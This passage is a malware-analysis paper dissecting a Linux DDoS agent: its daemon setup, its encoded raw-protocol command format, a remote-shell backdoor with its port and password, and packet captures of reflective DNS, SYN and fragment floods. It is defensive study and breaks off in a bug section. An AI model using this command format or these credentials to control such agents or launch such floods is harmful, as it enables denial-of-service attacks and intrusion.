1. Introduction
In this paper, we document our methodology and present our results in
analyzing an unknown binary. Our task is to determine, among other things,
its main functions and features.
An brief overview of the steps that we took can be described as
follows:
- First, we tried to learn as much as possible about the
binary, without having to execute it. This involved applying GNU/Linux
utilities like strings and objdump on the binary. This
way, we get an idea of what to expect when we do execute the binary.
- Then, we execute the binary under a controlled environment
to observe its behavioural characteristics. A controlled environment
will prevent the binary from doing unnecessary damage.
- Next, we proceeded to disassemble the binary to further
determine its full range of functions.
- Finally, we provided external stimuli to the binary by
injecting packets into the network to understand its network behaviour.
Details of our analysis in each of the above steps will be
described in the subsequent sections. We will also be highlighting a
bug that we uncovered in the code. Finally, we will conclude this paper
with some general comments.
2. Tools of the trade
We used both public domain and commercial tools in our analysis.
Besides native GNU/Linux utilities like strings, strace,
gdb, file, objdump, lsof, tcpdump and
ethereal, the following tools deserve special mention:
2.1 IDA Pro
IDA Pro [1] is by far the best code disassembly tool in our opinion.
It supports a myriad of processors and platforms, and has several excellent
features that drastically reduced our code disassembly effort. While
it is not free (the standard edition costs US$299), it is well worth the
money if you need a disassembler to do your job. Perhaps the the only
thing to wish for in this particular situation is a version that runs natively
in Linux; a Windows environment is required. This requirement introduces
a somewhat minor inconvenience, because the binary in question turns
out to be a Linux ELF executable. This means that we have to juggle between
a Linux machine and a Windows machine.
For those of you who are thinking of trying out IDA Pro in Wine
[2], we can report that we were unsuccessful in getting the latest 4.21
version, nor the freeware version, to run in Wine. However, we did
managed to get the older 4.18 version to work with Wine, with the occasional
non-fatal bugs. Other versions may work too. Unfortunately, it may be
difficult to get hold of an older version of IDA Pro, because the IDA Pro
website no longer provides them for download. So unless you are a registered
user and keep an older copy around (like us), then you may be out of luck,
until the compatibility issues get sorted out.
2.2 LibNet
LibNet [3] is a network programming library that aims to provide
a generic interface to network programming, without being tied down to
any particular types of network. LibNet also gives the programmer greater
control over the packet creation process. In the later part of our analysis,
we found a need to craft specific non-TCP or UDP network packets as external
stimuli to the binary. We did this easily with LibNet.
3. First Looks
One of the first things we did was to run the strings command
on the binary, probably because it is one of the easiest thing to do :-)
Looking through the entire strings
output, we immediately made 2 interesting observations. Firstly, we
spotted a section of strings that gave some indication as to the nature of
this binary:
[mingetty]
/tmp/.hj237349
/bin/csh -f -c "%s" 1> %s 2>&1
TfOjG
/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.
PATH
HISTFILE
linux
TERM
/bin/sh
/bin/csh -f -c "%s"
%d.%d.%d.%d
%u.%u.%u.%u
%c%s
We can clearly see what looks like:
- a process name
- a temporary storage file name
- some shell commands
- some environment variables
- some IP address format specifiers
- a strange looking string "TfOjG"
At this point, it is difficult to ascertain the exact purpose of
these strings, although one might be able to make intelligent enough guesses.
As it turns out, the purpose of these strings was revealed to us at a
later stage, during the disassembly process. Incidentally, this set of
strings can also be useful as a signature for detecting the binary in
the wild.
The second interesting bits were some strings that may allude to
the origin of the binary:
@(#) The Linux C library 5.3.12
GCC: (GNU) 2.7.2.l.2
GCC: (GNU) 2.7.2
This combination of gcc and C library versions were prevalent
4 or 5 years ago. Notice that this is also the same period of time where
Distributed Denial of Service (DDoS) started to rear its ugly head, led
by the tools like Tribes Flood Network [4]. It is possible that the binary
may have originated from around the same era. Of course, it is also possible
that the binary was compiled on a really old Linux distribution, e.g. RedHat
5.2.
Using the file command, we can see that this is a Linux ELF
binary built on the i386 platform, and is statically linked with symbols
and relocation bits stripped. This is bad news, because without symbols
information, the disassembly process will be more difficult.
root:# file the-binary
the-binary: ELF 32-bit LSB executable, Intel 80386, version 1, statically linked, stripped
The objdump command can also be used to derive various information
about an object file. But in this case, we did not learn any useful information
from the `objdump -x` command.
4. Execution in a Controlled Environment
Now that we have a vague idea regarding the nature of the binary,
our next step was to execute it in a controlled environment, to observe
its behavioural characteristics. Some information that we would be interested
to find out are:
- What network connections does it open?
- What files does it access?
- What system calls does it make?
- What are its process and memory footprint?
Our "controlled environment" is simply a default installation of a
Red Hat Linux 7.2 Workstation, connected to a network hub. Also hooked
up to this hub is another Red Hat Linux 7.2 Workstation. This second Linux
box functions as a network sniffer - it will pick up any network packet
that the binary emits. The sniffing software we used was the ever-reliable
tcpdump. This two machines are not connected to any other networks.
Fig 1: Testbed setup (IP addresses are for examples only)
Instead of simply executing the binary at the command line, we decided
to run it via the strace command. strace is a GNU/Linux system
utility that runs a specified program, and at the same time intercepts
and displays the system calls that are made by the program as well as the
signals that are received by the program. It is an extremely useful debugging
and instructional tool. When using strace, it is often useful to
use the "-f" switch, to instruct strace to follow forks into child
processes.
Thus, executing `strace -f` with the name of the binary as the
argument, we obtained the following output:
86 execve("./the-binary", ["./the-binary"], [/* 28 vars */]) = 0
86 personality(PER_LINUX) = 0
86 geteuid() = 0
86 sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x4004e928) = 0
86 fork() = 87
86 _exit(0) = ?
87 setsid() = 87
87 sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0
87 fork() = 88
87 _exit(0) = ?
88 chdir("/") = 0
88 close(0) = 0
88 close(1) = 0
88 close(2) = 0
88 time(NULL) = 1021725793
88 socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0
88 sigaction(SIGHUP, {SIG_IGN}, {SIG_DFL}, 0x4004e928) = 0
88 sigaction(SIGTERM, {SIG_IGN}, {SIG_DFL}, 0x4004e928) = 0
88 sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0
88 sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0
88 recv(0,
Now things start to get interesting. Let's look at the above system
trace in more detail.
The leftmost column lists the process IDs, or PIDs, of the current
process. The PID of the binary goes through 3 incarnations, i.e. 86, 87
and 88, because of the multiple forks. PID 88 is its final process ID.
First of all, the binary uses the geteuid() function to determine
if it is being executed with root privileges. If this function fails,
the binary will exit. This confirmation of root privileges is necessary
because subsequent actions of the binary, like opening a raw network socket,
requires root privileges.
The next few system calls will look confusing to someone who has not
programmed a daemon process in a Unix environment before. For the uninitiated,
he/she is urged to refer to the Unix Programming FAQ [5]. In particular,
section 1.7 of the FAQ is especially helpful to understand the initial
behaviour of the binary. Here is an excerpt:
Simply invoking a program in the background isn't really adequate for
these long-running programs; that does not correctly detach the process
from the terminal session that started it. Also, the conventional way of
starting daemons is simply to issue the command manually or from an rc script;
the daemon is expected to put itself into the background.
Here are the steps to become a daemon:
-
fork()
so the parent can exit, this returns control
to the command line or shell invoking your program. This step is required
so that the new process is guaranteed not to be a process group leader.
The next step, setsid()
, fails if you're a process group leader.
-
setsid()
to become a process group and session group
leader. Since a controlling terminal is associated with a session, and
this new session has not yet acquired a controlling terminal our process
now has no controlling terminal, which is a Good Thing for daemons.
-
fork()
again so the parent, (the session group leader),
can exit. This means that we, as a non-session group leader, can never
regain a controlling terminal.
-
chdir("/")
to ensure that our process doesn't keep
any directory in use. Failure to do this could make it so that an administrator
couldn't unmount a filesystem, because it was our current directory.
[Equivalently, we could change to any directory containing files important
to the daemon's operation.]
-
umask(0)
so that we have complete control over the
permissions of anything we write. We don't know what umask we may have
inherited. [This step is optional]
-
close()
fds 0, 1, and 2. This releases the standard
in, out, and error we inherited from our parent process. We have no way
of knowing where these fds might have been redirected to. Note that many
daemons use sysconf()
to determine the limit _SC_OPEN_MAX
.
_SC_OPEN_MAX
tells you the maximun open files/process.
Then in a loop, the daemon can close all possible file descriptors. You
have to decide if you need to do this or not. If you think that there
might be file-descriptors open you should close them, since there's a limit
on number of concurrent file descriptors.
-
Establish new open descriptors for stdin, stdout and stderr. Even
if you don't plan to use them, it is still a good idea to have them open.
The precise handling of these is a matter of taste; if you have a logfile,
for example, you might wish to open it as stdout or stderr, and open
`/dev/null' as stdin; alternatively, you could open `/dev/console'
as stderr and/or stdout, and `/dev/null' as stdin, or any other
combination that makes sense for your particular daemon.
As we can see now, the binary was merely observing good programming
etiquette expected of any daemon process, even though steps 5 and 7 were
skipped; they are non-applicable in this situation.
After closing standard in, out and error, the binary obtains the local
time and opens a raw socket of protocol 11 (0xb). According to the official
assigned list of protocol numbers maintained at iana.org [6], protocol 11
is assigned to "Network Voice Protocol", defined in RFC741 in 1977 [7].
We can safely say that this is now a defunct protocol, at least in the modern
Internet space. So the binary is using a protocol that is not used for any
known purpose.
Then, after setting itself up to ignore the SIGHUP and SIGTERM signals,
it sits quietly on the opened raw socket connection listening for incoming
data.
Using the netstat command, we verified that indeed a raw socket
of protocol 11 (0xB) has been opened and is in a listening state:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
raw 0 0 *:11 *:* 7
We also verified with lsof that the binary did not access
any files on the filesystem up to this stage. Neither did our network
sniffer pick up network packets emanated from the binary.
There is one additional action taken by the malware that is not apparent
from the strace output. If one were to use the ps command
to list the processes resident on the system at this moment, one would
notice a process that goes by the name "[mingetty]" with a PID of 88. As
we recall, PID 88 is the final PID of the binary. Apparently, the binary
has changed its process name to "[mingetty]".
However, if the top command was executed instead, then the process
name shown would still be the original name of the malware, i.e. "the-binary".
Clearly, top and ps uses different ways to read the process
name. top is the more sophisticated as it relies on the /proc-based
filesystem.
So much for the easy part. Now for the heady stuff...
5. Binary Analysis
We loaded the binary into IDA Pro, which promptly produces a disassembled
code listing. The size of the entire binary is over 200Kbytes long. However,
after much study of the disassembled code, we determined that the main daemon
logic code occupies only a small portion of the entire binary, specifically
from .text:0x08048134 to .text:0x08048EC5. Most of the remaining codes
are standard C library function codes. So we concentrated our efforts on
this portion of the binary.
The following commented listings are the fruits of our labour, and covers
almost the entire functionality of the daemon:
Listing 1: Main daemon logic code
in assembly language
Listing 2: Pseudo-C equivalent of main
daemon logic code
All-in-all, the daemon is programmed with 12 functionalities, dispatched
by a switch statement. Briefly, these functions are:
- Function 0 is for status query. The information returned
consist of the tuple: 1,7, attacking child pid, attacking type ( if child
pid != 0 ) The numbers 1 and 7 may be some form of version information,
as it is hardcoded into the binary.
Also, payloadbuf[1] is set to 3, which probably indicates a reply packet,
as opposed to payloadbuf[1] == 2 for traffic from a master to a slave.
- Function 1 sets the reply IP address of the master.There can be
10 possible reply addresses, and a reply may be sent to all 10 of them,
but only 1 should be the real master's IP address. The rest are most possibly
decoys. There are 3 possible cases:
- payloadbuf[2] == 2: all the reply addresses are copied from the
payload, of which one should be the true IP address of the master.
- payloadbuf[2] == 0: all the reply addresses are generated randomly
except the first, which is copied from the payload. This also sets a global
var (ctrl_parameter) which causes all future replies to be sent to
only 1 host -- the master.
- payloadbuf[2] == other values: An index is generated randomly.
All reply addresses are generated randomly except for the address at the
particular index generated earlier. This special address is copied from
the payload and should be the master's IP address.
- Function 2 executes a command specified in the payload and sends
back the output.
- Function 3 starts a single packet reflective DNS query attack
- Function 4 starts a fragmented IP packets attack
- Function 5 allows a remote shell to be spawned when a remote telnet
client connects to port 23281 and supply the password "SeNiF".
- Function 6 executes a command specified in the payload, but do
not send back the output
- Function 7 terminates an active listening remote shell or an ongoing
attack
- Function 8 starts a multiple packet reflective DNS query attack
- Function 9 starts a single packet TCP SYN attack
- Function 10 starts a multiple packet TCP SYN attack
- Finally, Function 11 floods a DNS server with DNS queries
More details will be revealed in the next section when we look at the
network behaviour.
We also noted that the daemon sports a network data encoding process.
All network packets exchanged between the master and the daemon are encoded
in this way. Fortunately for us, the encoder and decoder codes were easily
isolated. Furthermore the algorithm used turned out to be quite simple and
straightforward, so we had no problems translating the encoder and decoder
assembly codes into their pseudo-C equivalents.
Listing 3: Network data encoder in assembly
language
Listing 4: Pseudo-C equivalent of network
data encoder
Listing 5: Network data decoder in assembly
language
Listing 6: Pseudo-C equivalent of network
data decoder
6. Network Analysis
6.1 Getting interactive with the binary
In order to study the network behaviour of the binary in closer details
(it is afterall a network daemon), we need to be able to trigger
the binary from the network side by sending it network packets that it can
recognize. From the previous section, we have already figured out the network
encoding algorithm that the daemon and its master use. That enabled us to
write the following set of programs using libnet:
Listing 7: create_payload.c :
This is a single program that can create the necessary payloads to trigger
all the 12 functions of the binary. Once the program runs, the user will
receive instructions on screen to create the necessary payload for a specific
case. The payload will then be written to a file.
Listing 8: encode.c: This is the network
data encoder that encodes the payload so that the binary can decode it.
Listing 9: inject.c: This programs injects
the payload into the network.
Listing 10: receive.c: For Functions
1 and 3, the binary will respond with some data packet. This program can
be used to listen for the reply. However, in these cases, the payload for
Function 2 should first be sent to the binary to set the return return
address first.
So the sequence of commands that we run for each case is:
- ./create_payload output_file
- cat output_file | ./encode | ./inject -s bogus_source_ip
-d the-binary_ip
If a reply is expected, then of couse "./receive" must be execute before
the packet injection command.
Please refer the README file and the source
codes themselves in the inject directory for more details.
Now that we are able to trigger to the binary externally, let us examine
its network behaviour in details for each of the 12 functions.
6.2 Network behaviour of the binary
All the network traffic shown below were captured with tcpdump.
6.2.1 Function 1
We need to examine Function 1 first, because it sets the reply IP address
of the master. To illustrate what an encoded packet looks like, the following
is the packet that we send to the binary for this case:
10:14:08.640747 < 99.98.97.96 > 10.0.1.28: ip-proto-11 502 [tos 0x10]
4510 020a 00f2 0000 300b b809 6362 6160
0a00 011c 0201 1730 4869 8098 cfed 0c2c
4d6f 92b6 db01 2850 79a3 cefa 2755 84b4
e517 4a7e b3e9 2058 91cb 0642 7fbd fc3c
7dbf 0246 8bd1 1860 a9f3 3e8a d725 74c4
1567 ba0e 63b9 1068 c11b 76d2 2f8d ec4c
ad0f 72d6 3ba1 0870 d943 ae1a 87f5 64d4
The 1st 20 bytes in blue are the standard IP header. The next byte in
red is always 2 for packets sent from a master to the binary. The next
byte is not used. The rest of the packet are the encoded payload.
If we look at the corresponding decoded payload :
0000000 00 02 01 0a 00 01 20 07 08 09 0a 0b 0c 0d 0e 0f
0000020 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
0000040 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f
0000060 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f
0000100 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
The first byte is not used. The next byte is 02. We need to subtract
1 from this value to get the function number, which is function 1 in this
instance. This is how the master specifies to the daemon what function to
call. What follows are the parameters to the specified function. These of
course will vary in content from function to function.
In the case, the next byte is 01. For function 1, we name this byte
ctrl_parameter. It can take the value of either 0, 2 or any other
value. The next 4 bytes contains the master IP address, which is 10.0.1.32
(0a 00 01 20). The next 36 bytes contains what we call the auxiliary IP
addresses.
When ctrl_parameter is 0, the binary will only send reply to
one IP, the master IP. When ctrl_parameter is 2, the binary will
send replies to all 10 IPs in the payload, i.e. the master IP and the auxiliary
IPs. When ctrl_parameter is any other value, which is exactly the
case in the above payload, the binary will generate 9 random IPs and send
its reply to the master IP and the 9 random IPs.
6.2.2 Function 0
The following packet shows a status query packet to the binary :
10:14:12.300747 < 99.98.97.96 > 10.0.1.28: ip-proto-11 502 [tos 0x10]
4510 020a 00f2 0000 300b b809 6362 6160
0a00 011c 0201 172f 4862 7d99 b6d4 f313
3456 799d c2e8 0f37 608a b5e1 0e3c 6b9b
ccfe 3165 9ad0 073f 78b2 ed29 66a4 e323
64a6 e92d 72b8 ff47 90da 2571 be0c 5bab
fc4e a1f5 4aa0 f74f a802 5db9 1674 d333
94f6 59bd 2288 ef57 c02a 9501 6edc 4bbb
What is more interesting is the way the reply is sent back by the binary:
10:14:12.320747 > 10.0.1.28 > 123.246.85.96: ip-proto-11 478
10:14:12.330747 > 10.0.1.28 > 123.183.40.136: ip-proto-11 478
10:14:12.350747 > 10.0.1.28 > 35.57.172.73: ip-proto-11 478
10:14:12.360747 > 10.0.1.28 > 45.254.84.85: ip-proto-11 478
10:14:12.370747 > 10.0.1.28 > 10.0.1.32: ip-proto-11 478
10:14:12.380747 > 10.0.1.28 > 223.211.200.132: ip-proto-11 478
10:14:12.390747 > 10.0.1.28 > 9.17.242.51: ip-proto-11 478
10:14:12.400747 > 10.0.1.28 > 158.88.202.25: ip-proto-11 478
10:14:12.410747 > 10.0.1.28 > 78.31.122.201: ip-proto-11 478
Notice that an identical payload is replied to 9 destinations. The original
master IP 10.0.1.32 is one of them, and its position among the payloads
had been randomly determined when we called Function 1 earlier. Actually
10 destinations should be expected, but because the auxiliary IPs are generated
randomly, one of them happened to be in the invalid IP range and hence was
not sent out by the kernel.
Let's look at the one legitimate reply packet to 10.0.1.32 in detail
:
10:14:12.330747 > 10.0.1.28 > 123.183.40.136: ip-proto-11 478
4500 01f2 4251 0000 fa0b cd54 0a00 011c
7bb7 2888 0300 172f 4d64 7b84 9bb2 f91b
ea0a 84fd 75ec 0d24 3c6f 88a0 ce14 73ec
8030 fde8 f21c 67d4 6418 f1f0 1664 db7c
4840 65b8 3aec cfe4 2ca8 5940 5eb4 430c
1050 cd88 82bc 37f4 f438 c190 a604 ab9c
d860 3558 ca8c 9f04 bcc8 29e0 ee54 132c
Notice that the first byte after the IP header is now 03. The binary
always set this byte to 3 for the first packet of its reply, as opposed
to 2 for packets that it receives. We will examine this in more details when
we see a reply consisting of multiple packets in Function 2 below.
The first 5 bytes constitutes the reply, and they decode to 00 01 07
00 00. The first byte is taken from a global variable in the binary, but
appears to be always 0. The next 2 bytes are hardcoded and will always appear
as 01 07 for all packets sent for this case. We suspect that this is some
version information. The 4th byte will be 0 if there are no active attack
( Functions 3,4,8,9,10,11 ) or remote shell ( Function 5 ). If this byte
is 1, then the fifth byte contains the currently active function number +
1. This indicates to the master which function is currently active for this
daemon.
6.2.3 Function 2
In this function, a command is contained in the payload and the binary
will execute the command, then sends back the output of the command. In
this case, the command that we specify "ls -la /\n".
10:14:22.480747 < 99.98.97.96 > 10.0.1.28: ip-proto-11 502 [tos 0x10]
4510 020a 00f2 0000 300b b809 6362 6160
0a00 011c 0201 1731 b43e 75b9 3cb4 eb31
5269 8cb0 d5fb 224a 739d c8f4 214f 7eae
df11 4478 ade3 1a52 8bc5 003c 79b7 f636
77b9 fc40 85cb 125a a3ed 3884 d11f 6ebe
0f61 b408 5db3 0a62 bb15 70cc 2987 e646
a709 6cd0 359b 026a d33d a814 81ef 5ece
The decoded payload is as follows :
0000000 00 03 6c 73 20 2d 6c 61 20 2f 0a 00 0c 0d 0e 0f
0000020 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
The second byte indicates it is case 2. The rest of the payload up to
the first null character contains the command to execute. In this case,
it shows the string "ls -la /\n". The binary executes this command,
and pipes the output to a temporary file "/tmp/.hj237349" first. It then
reads back the content of the file, before encoding the data and subsequently
transmitting it.
As before, the reply is sent to multiple destinations. The difference
is that now, we observed that there are 4 packets sent to each destination.
That is because the binary sends at most 0x190 bytes in the encoded payload
( i.e. max pkt size = 0x190 + 2 + 20 ). If it needs to send more than this
size, it splits up the content into multiple packets. So if we look at
the replies sent to one particular address 123.246.85.96:
10:14:22.720747 > 10.0.1.28 > 123.246.85.96: ip-proto-11 419
4500 01b7 75a0 0000 fa0b 6d29 0a00 011c
7bf6 5560 0354 ...
10:14:23.220747 > 10.0.1.28 > 123.246.85.96: ip-proto-11 410
4500 01ae 4d52 0000 fa0b 9580 0a00 011c
7bf6 5560 0354 ...
10:14:23.720747 > 10.0.1.28 > 123.246.85.96: ip-proto-11 456
4500 01dc 007c 0000 fa0b e228 0a00 011c
7bf6 5560 0354 ...
10:14:24.220747 > 10.0.1.28 > 123.246.85.96: ip-proto-11 489
4500 01fd 028b 0000 fa0b dff8 0a00 011c
7bf6 5560 0354 ...
For all of them, the first byte after the IP header is 03, which as
we noted before, indicates a reply packet back to the master. The next
byte is not in use. The subsequent payload is the encoded output of the
command executed earlier. In our case, it is a directory listing of the
root directory. For each of the above payload, the first 2 bytes of the
payload decodes to the following:
6c 03
6c 04
6c 04
6c 04
The first byte is not used. We observed that for multi packet replies,
the 2nd byte is always 3 for first packet, and 4 for subsequent packets.
These bytes are properly additional control bytes used for multi-packet replies.
For the rest of the functions, no reply will be sent from the binary
back to the master. For the command packet sent to the binary, the first
22 bytes are similar. Hence we shall look at the encoded payload portion
from now on.
6.2.4 Function 3
The encoded payload for Function 3 is:
0000000 00 04 01 02 03 04 10 e1 00 61 62 63 00 0d 0e 0f
The second byte indicates Function 3. The next 4 bytes contains the
victim's ip. The next 2 bytes contains the victim port. The next byte indicates
whether the binary is to use the ip 01 02 03 04 or the hostname 61 62 63
00 ("abc") as the victim.
The response from the binary is as follows :
18:20:52.777481 > 1.2.3.4.rwhois > 157.16.248.3.domain: 5620+ SOA? com. (21)
4500 0031 a200 0000 d011 afa1 0102 0304
9d10 f803 10e1 0035 001d 0000 15f4 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.787481 > 1.2.3.4.rwhois > 157.16.251.2.domain: 43161+ SOA? com. (21)
4500 0031 c200 0000 bd11 9fa2 0102 0304
9d10 fb02 10e1 0035 001d 0000 a899 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.797481 > 1.2.3.4.rwhois > 157.160.32.12.domain: 61119+ SOA? com. (21)
4500 0031 2e00 0000 ba11 110a 0102 0304
9da0 200c 10e1 0035 001d 0000 eebf 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.807481 > 1.2.3.4.rwhois > 157.161.1.2.domain: 4076+ SOA? com. (21)
4500 0031 0b00 0000 a211 6b13 0102 0304
9da1 0102 10e1 0035 001d 0000 0fec 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.817481 > 1.2.3.4.rwhois > 157.164.136.8.domain: 42875+ SOA? com. (21)
4500 0031 9d00 0000 9411 6009 0102 0304
9da4 8808 10e1 0035 001d 0000 a77b 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.827481 > 1.2.3.4.rwhois > 157.164.136.9.domain: 42651+ SOA? com. (21)
4500 0031 4900 0000 8111 c708 0102 0304
9da4 8809 10e1 0035 001d 0000 a69b 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.837481 > 1.2.3.4.rwhois > 157.169.10.1.domain: 20878+ SOA? com. (21)
4500 0031 e700 0000 9511 930b 0102 0304
9da9 0a01 10e1 0035 001d 0000 518e 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
We see that the binary sends DNS queries to a preconfigured list of public
DNS servers with the victim's IP address as the source IP. The result is
a reflective DNS query attack on the victim. This form of attack is particularly
potent, because the DNS responses can be significantly larger than the
request, resulting in bandwidth amplification. Refer to CERT Incident Note
IN-2000-04 [8] for more details of this attack.
6.2.5 Function 4
The encoded payload for this function is:
0000000 00 05 00 07 01 02 03 04 05 06 07 08 00 61 62 63
0000020 00
The 2nd byte indicates it is case 4. The 3rd byte indicates whether
to use icmp or udp, while the 4th byte holds the victim's port if it is
udp. Interestingly, only 1 byte is allocated for this purpose. Therefore
the port value can only range from 1-255. The next 4 bytes contains the
victim's IP address. Then comes 4 bytes for a possibly faked source IP address.
The next byte indicates whether to use the ip 01 02 03 04 or the hostname
61 62 63 00 ("abc") as the victim. The response of the-binary is as follows
:
18:22:55.593553 < 1.2.3.4 > 10.0.1.28: ip-proto-11 502 [tos 0x10]
4510 020a 00f2 0000 300b 78c6 0102 0304
0a00 011c 0201 1733 4a68 8099 b3ce ea07
2544 5bd3 4cc6 dd05 2e58 83af dc0a 3969
9acc ff33 689e d50d 4680 bbf7 3472 b1f1
3274 b7fb 4086 cd15 5ea8 f33f 8cda 2979
ca1c 6fc3 186e c51d 76d0 2b87 e442 a101
62c4 278b f056 bd25 8ef8 63cf 3caa 1989
18:22:55.613553 > 5.6.7.8 > 1.2.3.4: (frag 1109:9@65520) [tos 0xb2,ECT]
45b2 001d 0455 1ffe c401 c1c7 0506 0708
0102 0304 0800 9567 c9ca cbcc cd
18:22:55.613553 > 5.6.7.8 > 1.2.3.4: (frag 1109:9@65520) [tos 0xb2,ECT]
45b2 001d 0455 1ffe c401 c1c7 0506 0708
0102 0304 0800 9567 c9ca cbcc cd
18:22:55.623553 > 5.6.7.8 > 1.2.3.4: (frag 1109:9@65520) [tos 0xb2,ECT]
45b2 001d 0455 1ffe c401 c1c7 0506 0708
0102 0304 0800 9567 c9ca cbcc cd
18:22:55.623553 > 5.6.7.8 > 1.2.3.4: (frag 1109:9@65520) [tos 0xb2,ECT]
45b2 001d 0455 1ffe c401 c1c7 0506 0708
0102 0304 0800 9567 c9ca cbcc cd
18:22:55.633553 > 5.6.7.8 > 1.2.3.4: (frag 1109:9@65520) [tos 0xb2,ECT]
45b2 001d 0455 1ffe c401 c1c7 0506 0708
0102 0304 0800 9567 c9ca cbcc cd
It sends out fragmented packets with 9 byte payload, but with an offset
of 65520, constituting a fragmented IP packets attack.
6.2.6 Function 5
The following is the payload for Function 5 :
0000000 00 06
The binary will spawn a child to listen on tcp port 23281. When remote
telnet connects to this port and types "SeNiF", a remote shell will be created.
Note that if you add 1 to each byte in this password, you will get the string
"TfOjG", which was the string that is shown in the strings output
in Section 3.
6.2.7 Function 6
The payload for Function 6 is identical to Function 2. The only difference
is that the binary does not send any reply in this case.
6.2.8 Function 7
The payload for Function 7 is as follows :
0000000 00 08
Upon receiving this packet, the binary will kill the active attacking
child or remote shell on receipt of this packet. The binary maintains a global
variable that indicates which function is currently active. At any one time,
only 1 attack function or remote shell function can be active.
6.2.9 Function 8
The payload for Function 8 is similar to Function 3, except that it
has 1 more field which controls the number of attacking packets sent out.
0000000 00 09 01 02 03 04 08 00 7b 00 61 62 63 00
The 2nd bytes indicates it is Function 8. The next 4 bytes specify the
victim IP address. The next byte, highlighted in red, is the field
that specifies the number of packets. The next 2 bytes specify the victim
port. The next byte indicates whether to use the ip 01 02 03 04 or to use
the hostname 61 62 63 00 ("abc") as the victim. The binary 's response to
this case is similar to case 3.
6.2.10 Function 9
This function starts a TCP SYN attack. The decoded payload is as follows:
0000000 00 0a 01 02 03 04 00 7b 00 05 06 07 08 00 61 62
0000020 63 00
The 4 bytes after the function code is the victim's IP. The next 2 bytes
is the victim's port. The next byte highlighted in red indicates whether
to generate a random source IP or to use the one supplied in the payload.
The next 4 bytes contains a probably faked source IP. The next byte indicates
whether to use the ip 01 02 03 04 or the hostname 61 62 63 00 ("abc") as
the victim.
The response the binary is as follows, illustrating a SYN attack. To
learn more about the TCP SYN attack, please refer to CERT Advisory CA-1996-21
[9].
18:25:28.885667 > 94.207.87.95.29342 > 1.2.3.4.ntp: S 35354633:35354633(0) win 1033
4500 0028 0385 0000 dc06 2117 5ecf 575f
0102 0304 729e 007b 021b 7809 0000 0000
5002 0409 0468 0000
18:25:28.895667 > 235.94.192.111.31802 > 1.2.3.4.ntp: S 30203676:30203676(0) win 1418
4500 0028 032d 0000 da06 2dcf eb5e c06f
0102 0304 7c3a 007b 01cc df1c 0000 0000
5002 058a 9ce6 0000
18:25:28.905667 > 212.209.113.103.10768 > 1.2.3.4.ntp: S 12671260:12671260(0) win 849
4500 0028 07b7 0000 b906 afda d4d1 7167
0102 0304 2a10 007b 00c1 591c 0000 0000
5002 0351 ddea 0000
18:25:28.915667 > 125.153.130.194.9037 > 1.2.3.4.ntp: S 17593335:17593335(0) win 449
4500 0028 0dcf 0000 8606 22a0 7d99 82c2
0102 0304 234d 007b 010c 73f7 0000 0000
5002 01c1 10f5 0000
6.2.11 Function 10
The payload for Function 10 is similar to Function 9, except that it
has 1 more field highlighted in red that controls the number of attacking
packets sent out.
0000000 00 0b 01 02 03 04 00 7b 01 05 06 07 08 09 00 61
0000020 62 63 00
The response for Function 10 is similar to Function 9.
6.2.12 Function 11
The payload for Function 11 is as follows :
0000000 00 0c 01 02 03 04 05 06 07 08 06 00 7b 00 61 62
0000020 63 00
01 02 03 04 is the victim's IP. The next 4 bytes contains a probably
faked source IP. The next byte highlighted in red indicates the number
of packets to generate. The next 2 bytes is the victim's port. The next
byte indicates whether to use the IP 01 02 03 04 or the hostname 61 62
63 00 ("abc") as the victim.
The response for Function 11 is as follows. It indicates an attack on
a single DNS server.
18:25:59.030630 > 5.6.7.8.ntp > 1.2.3.4.domain: 62485+ SOA? com. (21)
4500 0031 6700 0000 cc11 77a8 0506 0708
0102 0304 007b 0035 001d 0000 f415 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:25:59.030630 > 5.6.7.8.ntp > 1.2.3.4.domain: 41640+ SOA? net. (21)
4500 0031 9f00 0000 f311 18a8 0506 0708
0102 0304 007b 0035 001d 0000 a2a8 0100
0001 0000 0000 0000 036e 6574 0000 0600
01
18:25:59.030630 > 5.6.7.8.ntp > 1.2.3.4.domain: 49902+ (20)
4500 0030 2900 0000 c411 bda9 0506 0708
0102 0304 007b 0035 001c 0000 c2ee 0100
0001 0000 0000 0000 0364 6500 0006 0001
7. A bug
While exploring Function 2, we stumbled upon the following interesting
occurance. The picture below shows a captured response packet from the the
binary after executing Function 2. By right, all the data should be encoded,
so no plain-text should be seen. However, the picture clearly shows that
some plain-text has appeared in the "encoded" packet.
After much study of the source code, we finally figured out the reason
for the above anamoly. It has to do with the way the binary uses its buffers
in the encoding process.
There are 3 buffers declared in the binary, contiguous in memory, related
to this function:
char bufEncode[400];
char bufClear[512];
char bufTemp[2048];
When a shell command is executed, the output is first
piped to a file in the /tmp directory. Then the contents of this file are
read and stored in bufTemp, but in blocks of 0x18E = 398 bytes. The 398 bytes
of data are then transferred into the payload buffer, bufClear, prepended
with 2 bytes of control data to form a 400 bytes payload. The payload is
then encoded and stored in bufEncode of size 400 bytes. The contents of bufEncode
are then transmitted back to the master.
So far so good. However, the binary tries to be cute. Instead of transmitting
a fixed size payload of 400 bytes everytime, it tries to make the payload
size random, by adding a random number of 0 to 200 to the size of bufEncode.
As a result, the total number of bytes transmitted each time can vary between
